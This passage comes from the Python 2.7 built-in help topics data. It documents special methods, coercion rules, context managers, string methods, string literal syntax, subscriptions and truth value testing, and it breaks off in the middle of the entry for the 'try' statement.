If *x* is an instance of a class that\n does not define a "__iadd__()" method, "x.__add__(y)" and\n "y.__radd__(x)" are considered, as with the evaluation of "x + y".\n\nobject.__neg__(self)\nobject.__pos__(self)\nobject.__abs__(self)\nobject.__invert__(self)\n\n Called to implement the unary arithmetic operations ("-", "+",\n "abs()" and "~").\n\nobject.__complex__(self)\nobject.__int__(self)\nobject.__long__(self)\nobject.__float__(self)\n\n Called to implement the built-in functions "complex()", "int()",\n "long()", and "float()". Should return a value of the appropriate\n type.\n\nobject.__oct__(self)\nobject.__hex__(self)\n\n Called to implement the built-in functions "oct()" and "hex()".\n Should return a string value.\n\nobject.__index__(self)\n\n Called to implement "operator.index()". Also called whenever\n Python needs an integer object (such as in slicing). Must return\n an integer (int or long).\n\n New in version 2.5.\n\nobject.__coerce__(self, other)\n\n Called to implement "mixed-mode" numeric arithmetic. Should either\n return a 2-tuple containing *self* and *other* converted to a\n common numeric type, or "None" if conversion is impossible. When\n the common type would be the type of "other", it is sufficient to\n return "None", since the interpreter will also ask the other object\n to attempt a coercion (but sometimes, if the implementation of the\n other type cannot be changed, it is useful to do the conversion to\n the other type here). A return value of "NotImplemented" is\n equivalent to returning "None".\n\n\nCoercion rules\n==============\n\nThis section used to document the rules for coercion. As the language\nhas evolved, the coercion rules have become hard to document\nprecisely; documenting what one version of one particular\nimplementation does is undesirable. Instead, here are some informal\nguidelines regarding coercion. In Python 3, coercion will not be\nsupported.\n\n* If the left operand of a % operator is a string or Unicode object,\n no coercion takes place and the string formatting operation is\n invoked instead.\n\n* It is no longer recommended to define a coercion operation. Mixed-\n mode operations on types that don\'t define coercion pass the\n original arguments to the operation.\n\n* New-style classes (those derived from "object") never invoke the\n "__coerce__()" method in response to a binary operator; the only\n time "__coerce__()" is invoked is when the built-in function\n "coerce()" is called.\n\n* For most intents and purposes, an operator that returns\n "NotImplemented" is treated the same as one that is not implemented\n at all.\n\n* Below, "__op__()" and "__rop__()" are used to signify the generic\n method names corresponding to an operator; "__iop__()" is used for\n the corresponding in-place operator. For example, for the operator\n \'"+"\', "__add__()" and "__radd__()" are used for the left and right\n variant of the binary operator, and "__iadd__()" for the in-place\n variant.\n\n* For objects *x* and *y*, first "x.__op__(y)" is tried. If this is\n not implemented or returns "NotImplemented", "y.__rop__(x)" is\n tried. If this is also not implemented or returns "NotImplemented",\n a "TypeError" exception is raised. 
But see the following exception:\n\n* Exception to the previous item: if the left operand is an instance\n of a built-in type or a new-style class, and the right operand is an\n instance of a proper subclass of that type or class and overrides\n the base\'s "__rop__()" method, the right operand\'s "__rop__()"\n method is tried *before* the left operand\'s "__op__()" method.\n\n This is done so that a subclass can completely override binary\n operators. Otherwise, the left operand\'s "__op__()" method would\n always accept the right operand: when an instance of a given class\n is expected, an instance of a subclass of that class is always\n acceptable.\n\n* When either operand type defines a coercion, this coercion is\n called before that type\'s "__op__()" or "__rop__()" method is\n called, but no sooner. If the coercion returns an object of a\n different type for the operand whose coercion is invoked, part of\n the process is redone using the new object.\n\n* When an in-place operator (like \'"+="\') is used, if the left\n operand implements "__iop__()", it is invoked without any coercion.\n When the operation falls back to "__op__()" and/or "__rop__()", the\n normal coercion rules apply.\n\n* In "x + y", if *x* is a sequence that implements sequence\n concatenation, sequence concatenation is invoked.\n\n* In "x * y", if one operand is a sequence that implements sequence\n repetition, and the other is an integer ("int" or "long"), sequence\n repetition is invoked.\n\n* Rich comparisons (implemented by methods "__eq__()" and so on)\n never use coercion. Three-way comparison (implemented by\n "__cmp__()") does use coercion under the same conditions as other\n binary operations use it.\n\n* In the current implementation, the built-in numeric types "int",\n "long", "float", and "complex" do not use coercion. All these types\n implement a "__coerce__()" method, for use by the built-in\n "coerce()" function.\n\n Changed in version 2.7: The complex type no longer makes implicit\n calls to the "__coerce__()" method for mixed-type binary arithmetic\n operations.\n\n\nWith Statement Context Managers\n===============================\n\nNew in version 2.5.\n\nA *context manager* is an object that defines the runtime context to\nbe established when executing a "with" statement. The context manager\nhandles the entry into, and the exit from, the desired runtime context\nfor the execution of the block of code. Context managers are normally\ninvoked using the "with" statement (described in section The with\nstatement), but can also be used by directly invoking their methods.\n\nTypical uses of context managers include saving and restoring various\nkinds of global state, locking and unlocking resources, closing opened\nfiles, etc.\n\nFor more information on context managers, see Context Manager Types.\n\nobject.__enter__(self)\n\n Enter the runtime context related to this object. The "with"\n statement will bind this method\'s return value to the target(s)\n specified in the "as" clause of the statement, if any.\n\nobject.__exit__(self, exc_type, exc_value, traceback)\n\n Exit the runtime context related to this object. The parameters\n describe the exception that caused the context to be exited. If the\n context was exited without an exception, all three arguments will\n be "None".\n\n If an exception is supplied, and the method wishes to suppress the\n exception (i.e., prevent it from being propagated), it should\n return a true value. 
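As a sketch, a context manager (the "ignore_zero_division" class is\nhypothetical) can suppress a specific exception by returning a true\nvalue from "__exit__()":\n\n   class ignore_zero_division(object):\n       def __enter__(self):\n           return self\n       def __exit__(self, exc_type, exc_value, traceback):\n           # A true result suppresses the exception; a false result\n           # lets it propagate.\n           return exc_type is ZeroDivisionError\n\n   >>> with ignore_zero_division():\n   ...     1 / 0\n   ...\n\n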
Otherwise, the exception will be processed\n normally upon exit from this method.\n\n Note that "__exit__()" methods should not reraise the passed-in\n exception; this is the caller\'s responsibility.\n\nSee also:\n\n **PEP 0343** - The "with" statement\n The specification, background, and examples for the Python "with"\n statement.\n\n\nSpecial method lookup for old-style classes\n===========================================\n\nFor old-style classes, special methods are always looked up in exactly\nthe same way as any other method or attribute. This is the case\nregardless of whether the method is being looked up explicitly as in\n"x.__getitem__(i)" or implicitly as in "x[i]".\n\nThis behaviour means that special methods may exhibit different\nbehaviour for different instances of a single old-style class if the\nappropriate special attributes are set differently:\n\n >>> class C:\n ... pass\n ...\n >>> c1 = C()\n >>> c2 = C()\n >>> c1.__len__ = lambda: 5\n >>> c2.__len__ = lambda: 9\n >>> len(c1)\n 5\n >>> len(c2)\n 9\n\n\nSpecial method lookup for new-style classes\n===========================================\n\nFor new-style classes, implicit invocations of special methods are\nonly guaranteed to work correctly if defined on an object\'s type, not\nin the object\'s instance dictionary. That behaviour is the reason why\nthe following code raises an exception (unlike the equivalent example\nwith old-style classes):\n\n >>> class C(object):\n ... pass\n ...\n >>> c = C()\n >>> c.__len__ = lambda: 5\n >>> len(c)\n Traceback (most recent call last):\n File "<stdin>", line 1, in <module>\n TypeError: object of type \'C\' has no len()\n\nThe rationale behind this behaviour lies with a number of special\nmethods such as "__hash__()" and "__repr__()" that are implemented by\nall objects, including type objects. If the implicit lookup of these\nmethods used the conventional lookup process, they would fail when\ninvoked on the type object itself:\n\n >>> 1 .__hash__() == hash(1)\n True\n >>> int.__hash__() == hash(int)\n Traceback (most recent call last):\n File "<stdin>", line 1, in <module>\n TypeError: descriptor \'__hash__\' of \'int\' object needs an argument\n\nIncorrectly attempting to invoke an unbound method of a class in this\nway is sometimes referred to as \'metaclass confusion\', and is avoided\nby bypassing the instance when looking up special methods:\n\n >>> type(1).__hash__(1) == hash(1)\n True\n >>> type(int).__hash__(int) == hash(int)\n True\n\nIn addition to bypassing any instance attributes in the interest of\ncorrectness, implicit special method lookup generally also bypasses\nthe "__getattribute__()" method even of the object\'s metaclass:\n\n >>> class Meta(type):\n ... def __getattribute__(*args):\n ... print "Metaclass getattribute invoked"\n ... return type.__getattribute__(*args)\n ...\n >>> class C(object):\n ... __metaclass__ = Meta\n ... def __len__(self):\n ... return 10\n ... def __getattribute__(*args):\n ... print "Class getattribute invoked"\n ... 
return object.__getattribute__(*args)\n ...\n >>> c = C()\n >>> c.__len__() # Explicit lookup via instance\n Class getattribute invoked\n 10\n >>> type(c).__len__(c) # Explicit lookup via type\n Metaclass getattribute invoked\n 10\n >>> len(c) # Implicit lookup\n 10\n\nBypassing the "__getattribute__()" machinery in this fashion provides\nsignificant scope for speed optimisations within the interpreter, at\nthe cost of some flexibility in the handling of special methods (the\nspecial method *must* be set on the class object itself in order to be\nconsistently invoked by the interpreter).\n\n-[ Footnotes ]-\n\n[1] It *is* possible in some cases to change an object\'s type,\n under certain controlled conditions. It generally isn\'t a good\n idea though, since it can lead to some very strange behaviour if\n it is handled incorrectly.\n\n[2] For operands of the same type, it is assumed that if the non-\n reflected method (such as "__add__()") fails the operation is not\n supported, which is why the reflected method is not called.\n', 'string-methods': u'\nString Methods\n**************\n\nBelow are listed the string methods which both 8-bit strings and\nUnicode objects support. Some of them are also available on\n"bytearray" objects.\n\nIn addition, Python\'s strings support the sequence type methods\ndescribed in the Sequence Types --- str, unicode, list, tuple,\nbytearray, buffer, xrange section. To output formatted strings use\ntemplate strings or the "%" operator described in the String\nFormatting Operations section. Also, see the "re" module for string\nfunctions based on regular expressions.\n\nstr.capitalize()\n\n Return a copy of the string with its first character capitalized\n and the rest lowercased.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.center(width[, fillchar])\n\n Return centered in a string of length *width*. Padding is done\n using the specified *fillchar* (default is a space).\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.count(sub[, start[, end]])\n\n Return the number of non-overlapping occurrences of substring *sub*\n in the range [*start*, *end*]. Optional arguments *start* and\n *end* are interpreted as in slice notation.\n\nstr.decode([encoding[, errors]])\n\n Decodes the string using the codec registered for *encoding*.\n *encoding* defaults to the default string encoding. *errors* may\n be given to set a different error handling scheme. The default is\n "\'strict\'", meaning that encoding errors raise "UnicodeError".\n Other possible values are "\'ignore\'", "\'replace\'" and any other\n name registered via "codecs.register_error()", see section Codec\n Base Classes.\n\n New in version 2.2.\n\n Changed in version 2.3: Support for other error handling schemes\n added.\n\n Changed in version 2.7: Support for keyword arguments added.\n\nstr.encode([encoding[, errors]])\n\n Return an encoded version of the string. Default encoding is the\n current default string encoding. *errors* may be given to set a\n different error handling scheme. The default for *errors* is\n "\'strict\'", meaning that encoding errors raise a "UnicodeError".\n Other possible values are "\'ignore\'", "\'replace\'",\n "\'xmlcharrefreplace\'", "\'backslashreplace\'" and any other name\n registered via "codecs.register_error()", see section Codec Base\n Classes. 
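For example, different error handlers give different results for a\ncharacter that cannot be encoded:\n\n   >>> u\'caf\\xe9\'.encode(\'ascii\', \'replace\')\n   \'caf?\'\n   >>> u\'caf\\xe9\'.encode(\'ascii\', \'xmlcharrefreplace\')\n   \'caf&#233;\'\n\n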
For a list of possible encodings, see section Standard\n Encodings.\n\n New in version 2.0.\n\n Changed in version 2.3: Support for "\'xmlcharrefreplace\'" and\n "\'backslashreplace\'" and other error handling schemes added.\n\n Changed in version 2.7: Support for keyword arguments added.\n\nstr.endswith(suffix[, start[, end]])\n\n Return "True" if the string ends with the specified *suffix*,\n otherwise return "False". *suffix* can also be a tuple of suffixes\n to look for. With optional *start*, test beginning at that\n position. With optional *end*, stop comparing at that position.\n\n Changed in version 2.5: Accept tuples as *suffix*.\n\nstr.expandtabs([tabsize])\n\n Return a copy of the string where all tab characters are replaced\n by one or more spaces, depending on the current column and the\n given tab size. Tab positions occur every *tabsize* characters\n (default is 8, giving tab positions at columns 0, 8, 16 and so on).\n To expand the string, the current column is set to zero and the\n string is examined character by character. If the character is a\n tab ("\\t"), one or more space characters are inserted in the result\n until the current column is equal to the next tab position. (The\n tab character itself is not copied.) If the character is a newline\n ("\\n") or return ("\\r"), it is copied and the current column is\n reset to zero. Any other character is copied unchanged and the\n current column is incremented by one regardless of how the\n character is represented when printed.\n\n >>> \'01\\t012\\t0123\\t01234\'.expandtabs()\n \'01      012     0123    01234\'\n >>> \'01\\t012\\t0123\\t01234\'.expandtabs(4)\n \'01  012 0123    01234\'\n\nstr.find(sub[, start[, end]])\n\n Return the lowest index in the string where substring *sub* is\n found within the slice "s[start:end]". Optional arguments *start*\n and *end* are interpreted as in slice notation. Return "-1" if\n *sub* is not found.\n\n Note: The "find()" method should be used only if you need to know\n the position of *sub*. To check if *sub* is a substring or not,\n use the "in" operator:\n\n >>> \'Py\' in \'Python\'\n True\n\nstr.format(*args, **kwargs)\n\n Perform a string formatting operation. The string on which this\n method is called can contain literal text or replacement fields\n delimited by braces "{}". Each replacement field contains either\n the numeric index of a positional argument, or the name of a\n keyword argument. 
Returns a copy of the string where each\n replacement field is replaced with the string value of the\n corresponding argument.\n\n >>> "The sum of 1 + 2 is {0}".format(1+2)\n \'The sum of 1 + 2 is 3\'\n\n See Format String Syntax for a description of the various\n formatting options that can be specified in format strings.\n\n This method of string formatting is the new standard in Python 3,\n and should be preferred to the "%" formatting described in String\n Formatting Operations in new code.\n\n New in version 2.6.\n\nstr.index(sub[, start[, end]])\n\n Like "find()", but raise "ValueError" when the substring is not\n found.\n\nstr.isalnum()\n\n Return true if all characters in the string are alphanumeric and\n there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isalpha()\n\n Return true if all characters in the string are alphabetic and\n there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isdigit()\n\n Return true if all characters in the string are digits and there is\n at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.islower()\n\n Return true if all cased characters [4] in the string are lowercase\n and there is at least one cased character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isspace()\n\n Return true if there are only whitespace characters in the string\n and there is at least one character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.istitle()\n\n Return true if the string is a titlecased string and there is at\n least one character, for example uppercase characters may only\n follow uncased characters and lowercase characters only cased ones.\n Return false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.isupper()\n\n Return true if all cased characters [4] in the string are uppercase\n and there is at least one cased character, false otherwise.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.join(iterable)\n\n Return a string which is the concatenation of the strings in the\n *iterable* *iterable*. The separator between elements is the\n string providing this method.\n\nstr.ljust(width[, fillchar])\n\n Return the string left justified in a string of length *width*.\n Padding is done using the specified *fillchar* (default is a\n space). The original string is returned if *width* is less than or\n equal to "len(s)".\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.lower()\n\n Return a copy of the string with all the cased characters [4]\n converted to lowercase.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.lstrip([chars])\n\n Return a copy of the string with leading characters removed. The\n *chars* argument is a string specifying the set of characters to be\n removed. If omitted or "None", the *chars* argument defaults to\n removing whitespace. The *chars* argument is not a prefix; rather,\n all combinations of its values are stripped:\n\n >>> \' spacious \'.lstrip()\n \'spacious \'\n >>> \'www.example.com\'.lstrip(\'cmowz.\')\n \'example.com\'\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.partition(sep)\n\n Split the string at the first occurrence of *sep*, and return a\n 3-tuple containing the part before the separator, the separator\n itself, and the part after the separator. 
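For example:\n\n   >>> \'key=value\'.partition(\'=\')\n   (\'key\', \'=\', \'value\')\n\n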
If the separator is not\n found, return a 3-tuple containing the string itself, followed by\n two empty strings.\n\n New in version 2.5.\n\nstr.replace(old, new[, count])\n\n Return a copy of the string with all occurrences of substring *old*\n replaced by *new*. If the optional argument *count* is given, only\n the first *count* occurrences are replaced.\n\nstr.rfind(sub[, start[, end]])\n\n Return the highest index in the string where substring *sub* is\n found, such that *sub* is contained within "s[start:end]".\n Optional arguments *start* and *end* are interpreted as in slice\n notation. Return "-1" on failure.\n\nstr.rindex(sub[, start[, end]])\n\n Like "rfind()" but raises "ValueError" when the substring *sub* is\n not found.\n\nstr.rjust(width[, fillchar])\n\n Return the string right justified in a string of length *width*.\n Padding is done using the specified *fillchar* (default is a\n space). The original string is returned if *width* is less than or\n equal to "len(s)".\n\n Changed in version 2.4: Support for the *fillchar* argument.\n\nstr.rpartition(sep)\n\n Split the string at the last occurrence of *sep*, and return a\n 3-tuple containing the part before the separator, the separator\n itself, and the part after the separator. If the separator is not\n found, return a 3-tuple containing two empty strings, followed by\n the string itself.\n\n New in version 2.5.\n\nstr.rsplit([sep[, maxsplit]])\n\n Return a list of the words in the string, using *sep* as the\n delimiter string. If *maxsplit* is given, at most *maxsplit* splits\n are done, the *rightmost* ones. If *sep* is not specified or\n "None", any whitespace string is a separator. Except for splitting\n from the right, "rsplit()" behaves like "split()" which is\n described in detail below.\n\n New in version 2.4.\n\nstr.rstrip([chars])\n\n Return a copy of the string with trailing characters removed. The\n *chars* argument is a string specifying the set of characters to be\n removed. If omitted or "None", the *chars* argument defaults to\n removing whitespace. The *chars* argument is not a suffix; rather,\n all combinations of its values are stripped:\n\n >>> \' spacious \'.rstrip()\n \' spacious\'\n >>> \'mississippi\'.rstrip(\'ipz\')\n \'mississ\'\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.split([sep[, maxsplit]])\n\n Return a list of the words in the string, using *sep* as the\n delimiter string. If *maxsplit* is given, at most *maxsplit*\n splits are done (thus, the list will have at most "maxsplit+1"\n elements). If *maxsplit* is not specified or "-1", then there is\n no limit on the number of splits (all possible splits are made).\n\n If *sep* is given, consecutive delimiters are not grouped together\n and are deemed to delimit empty strings (for example,\n "\'1,,2\'.split(\',\')" returns "[\'1\', \'\', \'2\']"). The *sep* argument\n may consist of multiple characters (for example,\n "\'1<>2<>3\'.split(\'<>\')" returns "[\'1\', \'2\', \'3\']"). Splitting an\n empty string with a specified separator returns "[\'\']".\n\n If *sep* is not specified or is "None", a different splitting\n algorithm is applied: runs of consecutive whitespace are regarded\n as a single separator, and the result will contain no empty strings\n at the start or end if the string has leading or trailing\n whitespace. 
Consequently, splitting an empty string or a string\n consisting of just whitespace with a "None" separator returns "[]".\n\n For example, "\' 1 2 3 \'.split()" returns "[\'1\', \'2\', \'3\']", and\n "\' 1 2 3 \'.split(None, 1)" returns "[\'1\', \'2 3 \']".\n\nstr.splitlines([keepends])\n\n Return a list of the lines in the string, breaking at line\n boundaries. This method uses the *universal newlines* approach to\n splitting lines. Line breaks are not included in the resulting list\n unless *keepends* is given and true.\n\n For example, "\'ab c\\n\\nde fg\\rkl\\r\\n\'.splitlines()" returns "[\'ab\n c\', \'\', \'de fg\', \'kl\']", while the same call with\n "splitlines(True)" returns "[\'ab c\\n\', \'\\n\', \'de fg\\r\', \'kl\\r\\n\']".\n\n Unlike "split()" when a delimiter string *sep* is given, this\n method returns an empty list for the empty string, and a terminal\n line break does not result in an extra line.\n\nstr.startswith(prefix[, start[, end]])\n\n Return "True" if string starts with the *prefix*, otherwise return\n "False". *prefix* can also be a tuple of prefixes to look for.\n With optional *start*, test string beginning at that position.\n With optional *end*, stop comparing string at that position.\n\n Changed in version 2.5: Accept tuples as *prefix*.\n\nstr.strip([chars])\n\n Return a copy of the string with the leading and trailing\n characters removed. The *chars* argument is a string specifying the\n set of characters to be removed. If omitted or "None", the *chars*\n argument defaults to removing whitespace. The *chars* argument is\n not a prefix or suffix; rather, all combinations of its values are\n stripped:\n\n >>> \' spacious \'.strip()\n \'spacious\'\n >>> \'www.example.com\'.strip(\'cmowz.\')\n \'example\'\n\n Changed in version 2.2.2: Support for the *chars* argument.\n\nstr.swapcase()\n\n Return a copy of the string with uppercase characters converted to\n lowercase and vice versa.\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.title()\n\n Return a titlecased version of the string where words start with an\n uppercase character and the remaining characters are lowercase.\n\n The algorithm uses a simple language-independent definition of a\n word as groups of consecutive letters. The definition works in\n many contexts but it means that apostrophes in contractions and\n possessives form word boundaries, which may not be the desired\n result:\n\n >>> "they\'re bill\'s friends from the UK".title()\n "They\'Re Bill\'S Friends From The Uk"\n\n A workaround for apostrophes can be constructed using regular\n expressions:\n\n >>> import re\n >>> def titlecase(s):\n ... return re.sub(r"[A-Za-z]+(\'[A-Za-z]+)?",\n ... lambda mo: mo.group(0)[0].upper() +\n ... mo.group(0)[1:].lower(),\n ... s)\n ...\n >>> titlecase("they\'re bill\'s friends.")\n "They\'re Bill\'s Friends."\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.translate(table[, deletechars])\n\n Return a copy of the string where all characters occurring in the\n optional argument *deletechars* are removed, and the remaining\n characters have been mapped through the given translation table,\n which must be a string of length 256.\n\n You can use the "maketrans()" helper function in the "string"\n module to create a translation table. 
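For example, building a translation table with "maketrans()" and\napplying it:\n\n   >>> from string import maketrans\n   >>> \'abcdef\'.translate(maketrans(\'abc\', \'xyz\'))\n   \'xyzdef\'\n\n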
For string objects, set the\n *table* argument to "None" for translations that only delete\n characters:\n\n >>> \'read this short text\'.translate(None, \'aeiou\')\n \'rd ths shrt txt\'\n\n New in version 2.6: Support for a "None" *table* argument.\n\n For Unicode objects, the "translate()" method does not accept the\n optional *deletechars* argument. Instead, it returns a copy of the\n *s* where all characters have been mapped through the given\n translation table which must be a mapping of Unicode ordinals to\n Unicode ordinals, Unicode strings or "None". Unmapped characters\n are left untouched. Characters mapped to "None" are deleted. Note,\n a more flexible approach is to create a custom character mapping\n codec using the "codecs" module (see "encodings.cp1251" for an\n example).\n\nstr.upper()\n\n Return a copy of the string with all the cased characters [4]\n converted to uppercase. Note that "str.upper().isupper()" might be\n "False" if "s" contains uncased characters or if the Unicode\n category of the resulting character(s) is not "Lu" (Letter,\n uppercase), but e.g. "Lt" (Letter, titlecase).\n\n For 8-bit strings, this method is locale-dependent.\n\nstr.zfill(width)\n\n Return the numeric string left filled with zeros in a string of\n length *width*. A sign prefix is handled correctly. The original\n string is returned if *width* is less than or equal to "len(s)".\n\n New in version 2.2.2.\n\nThe following methods are present only on unicode objects:\n\nunicode.isnumeric()\n\n Return "True" if there are only numeric characters in S, "False"\n otherwise. Numeric characters include digit characters, and all\n characters that have the Unicode numeric value property, e.g.\n U+2155, VULGAR FRACTION ONE FIFTH.\n\nunicode.isdecimal()\n\n Return "True" if there are only decimal characters in S, "False"\n otherwise. Decimal characters include digit characters, and all\n characters that can be used to form decimal-radix numbers, e.g.\n U+0660, ARABIC-INDIC DIGIT ZERO.\n', 'strings': u'\nString literals\n***************\n\nString literals are described by the following lexical definitions:\n\n stringliteral ::= [stringprefix](shortstring | longstring)\n stringprefix ::= "r" | "u" | "ur" | "R" | "U" | "UR" | "Ur" | "uR"\n | "b" | "B" | "br" | "Br" | "bR" | "BR"\n shortstring ::= "\'" shortstringitem* "\'" | \'"\' shortstringitem* \'"\'\n longstring ::= "\'\'\'" longstringitem* "\'\'\'"\n | \'"""\' longstringitem* \'"""\'\n shortstringitem ::= shortstringchar | escapeseq\n longstringitem ::= longstringchar | escapeseq\n shortstringchar ::= <any source character except "\\" or newline or the quote>\n longstringchar ::= <any source character except "\\">\n escapeseq ::= "\\" <any ASCII character>\n\nOne syntactic restriction not indicated by these productions is that\nwhitespace is not allowed between the "stringprefix" and the rest of\nthe string literal. The source character set is defined by the\nencoding declaration; it is ASCII if no encoding declaration is given\nin the source file; see section Encoding declarations.\n\nIn plain English: String literals can be enclosed in matching single\nquotes ("\'") or double quotes ("""). They can also be enclosed in\nmatching groups of three single or double quotes (these are generally\nreferred to as *triple-quoted strings*). 
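For example, all four quoting styles denote the same string:\n\n   >>> \'spam\' == "spam" == \'\'\'spam\'\'\' == """spam"""\n   True\n\n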
The backslash ("\\")\ncharacter is used to escape characters that otherwise have a special\nmeaning, such as newline, backslash itself, or the quote character.\nString literals may optionally be prefixed with a letter "\'r\'" or\n"\'R\'"; such strings are called *raw strings* and use different rules\nfor interpreting backslash escape sequences. A prefix of "\'u\'" or\n"\'U\'" makes the string a Unicode string. Unicode strings use the\nUnicode character set as defined by the Unicode Consortium and ISO\n10646. Some additional escape sequences, described below, are\navailable in Unicode strings. A prefix of "\'b\'" or "\'B\'" is ignored in\nPython 2; it indicates that the literal should become a bytes literal\nin Python 3 (e.g. when code is automatically converted with 2to3). A\n"\'u\'" or "\'b\'" prefix may be followed by an "\'r\'" prefix.\n\nIn triple-quoted strings, unescaped newlines and quotes are allowed\n(and are retained), except that three unescaped quotes in a row\nterminate the string. (A "quote" is the character used to open the\nstring, i.e. either "\'" or """.)\n\nUnless an "\'r\'" or "\'R\'" prefix is present, escape sequences in\nstrings are interpreted according to rules similar to those used by\nStandard C. The recognized escape sequences are:\n\n+-------------------+-----------------------------------+---------+\n| Escape Sequence | Meaning | Notes |\n+===================+===================================+=========+\n| "\\newline" | Ignored | |\n+-------------------+-----------------------------------+---------+\n| "\\\\" | Backslash ("\\") | |\n+-------------------+-----------------------------------+---------+\n| "\\\'" | Single quote ("\'") | |\n+-------------------+-----------------------------------+---------+\n| "\\"" | Double quote (""") | |\n+-------------------+-----------------------------------+---------+\n| "\\a" | ASCII Bell (BEL) | |\n+-------------------+-----------------------------------+---------+\n| "\\b" | ASCII Backspace (BS) | |\n+-------------------+-----------------------------------+---------+\n| "\\f" | ASCII Formfeed (FF) | |\n+-------------------+-----------------------------------+---------+\n| "\\n" | ASCII Linefeed (LF) | |\n+-------------------+-----------------------------------+---------+\n| "\\N{name}" | Character named *name* in the | |\n| | Unicode database (Unicode only) | |\n+-------------------+-----------------------------------+---------+\n| "\\r" | ASCII Carriage Return (CR) | |\n+-------------------+-----------------------------------+---------+\n| "\\t" | ASCII Horizontal Tab (TAB) | |\n+-------------------+-----------------------------------+---------+\n| "\\uxxxx" | Character with 16-bit hex value | (1) |\n| | *xxxx* (Unicode only) | |\n+-------------------+-----------------------------------+---------+\n| "\\Uxxxxxxxx" | Character with 32-bit hex value | (2) |\n| | *xxxxxxxx* (Unicode only) | |\n+-------------------+-----------------------------------+---------+\n| "\\v" | ASCII Vertical Tab (VT) | |\n+-------------------+-----------------------------------+---------+\n| "\\ooo" | Character with octal value *ooo* | (3,5) |\n+-------------------+-----------------------------------+---------+\n| "\\xhh" | Character with hex value *hh* | (4,5) |\n+-------------------+-----------------------------------+---------+\n\nNotes:\n\n1. Individual code units which form parts of a surrogate pair can\n be encoded using this escape sequence.\n\n2. 
Any Unicode character can be encoded this way, but characters\n outside the Basic Multilingual Plane (BMP) will be encoded using a\n surrogate pair if Python is compiled to use 16-bit code units (the\n default).\n\n3. As in Standard C, up to three octal digits are accepted.\n\n4. Unlike in Standard C, exactly two hex digits are required.\n\n5. In a string literal, hexadecimal and octal escapes denote the\n byte with the given value; it is not necessary that the byte\n encodes a character in the source character set. In a Unicode\n literal, these escapes denote a Unicode character with the given\n value.\n\nUnlike Standard C, all unrecognized escape sequences are left in the\nstring unchanged, i.e., *the backslash is left in the string*. (This\nbehavior is useful when debugging: if an escape sequence is mistyped,\nthe resulting output is more easily recognized as broken.) It is also\nimportant to note that the escape sequences marked as "(Unicode only)"\nin the table above fall into the category of unrecognized escapes for\nnon-Unicode string literals.\n\nWhen an "\'r\'" or "\'R\'" prefix is present, a character following a\nbackslash is included in the string without change, and *all\nbackslashes are left in the string*. For example, the string literal\n"r"\\n"" consists of two characters: a backslash and a lowercase "\'n\'".\nString quotes can be escaped with a backslash, but the backslash\nremains in the string; for example, "r"\\""" is a valid string literal\nconsisting of two characters: a backslash and a double quote; "r"\\""\nis not a valid string literal (even a raw string cannot end in an odd\nnumber of backslashes). Specifically, *a raw string cannot end in a\nsingle backslash* (since the backslash would escape the following\nquote character). Note also that a single backslash followed by a\nnewline is interpreted as those two characters as part of the string,\n*not* as a line continuation.\n\nWhen an "\'r\'" or "\'R\'" prefix is used in conjunction with a "\'u\'" or\n"\'U\'" prefix, then the "\\uXXXX" and "\\UXXXXXXXX" escape sequences are\nprocessed while *all other backslashes are left in the string*. For\nexample, the string literal "ur"\\u0062\\n"" consists of three Unicode\ncharacters: \'LATIN SMALL LETTER B\', \'REVERSE SOLIDUS\', and \'LATIN\nSMALL LETTER N\'. Backslashes can be escaped with a preceding\nbackslash; however, both remain in the string. As a result, "\\uXXXX"\nescape sequences are only recognized when there are an odd number of\nbackslashes.\n', 'subscriptions': u'\nSubscriptions\n*************\n\nA subscription selects an item of a sequence (string, tuple or list)\nor mapping (dictionary) object:\n\n subscription ::= primary "[" expression_list "]"\n\nThe primary must evaluate to an object of a sequence or mapping type.\n\nIf the primary is a mapping, the expression list must evaluate to an\nobject whose value is one of the keys of the mapping, and the\nsubscription selects the value in the mapping that corresponds to that\nkey. (The expression list is a tuple except if it has exactly one\nitem.)\n\nIf the primary is a sequence, the expression (list) must evaluate to a\nplain integer. If this value is negative, the length of the sequence\nis added to it (so that, e.g., "x[-1]" selects the last item of "x".)\nThe resulting value must be a nonnegative integer less than the number\nof items in the sequence, and the subscription selects the item whose\nindex is that value (counting from zero).\n\nA string\'s items are characters. 
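For example:\n\n   >>> \'Python\'[0]\n   \'P\'\n   >>> \'Python\'[-1]\n   \'n\'\n   >>> {\'one\': 1}[\'one\']\n   1\n\n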
A character is not a separate data\ntype but a string of exactly one character.\n', 'truth': u'\nTruth Value Testing\n*******************\n\nAny object can be tested for truth value, for use in an "if" or\n"while" condition or as operand of the Boolean operations below. The\nfollowing values are considered false:\n\n* "None"\n\n* "False"\n\n* zero of any numeric type, for example, "0", "0L", "0.0", "0j".\n\n* any empty sequence, for example, "\'\'", "()", "[]".\n\n* any empty mapping, for example, "{}".\n\n* instances of user-defined classes, if the class defines a\n "__nonzero__()" or "__len__()" method, when that method returns the\n integer zero or "bool" value "False". [1]\n\nAll other values are considered true --- so objects of many types are\nalways true.\n\nOperations and built-in functions that have a Boolean result always\nreturn "0" or "False" for false and "1" or "True" for true, unless\notherwise stated. (Important exception: the Boolean operations "or"\nand "and" always return one of their operands.)\n', 'try': u'\nThe "try" statement\n*******************\n\nThe "try" statement specifies exception handlers and/or cleanup code\nfor a group of statements:\n\n try_stmt ::= try1_stmt | try2_stmt\n try1_stmt ::= "try" ":" suite\n ("except" [expression [("as" | ",") identifier]] ":" suite)+\n ["else" ":" suite]\n ["finally" ":" suite]\n try2_stmt ::= "try" ":" suite\n "finally" ":" suite\n\nChanged in version 2.5: In previous versions of Python,\n"try"..."except"..."finally" did not work. "try"..."except" had to be\nnested in "try"..."finally".\n\nThe "except" clause(s) specify one or more 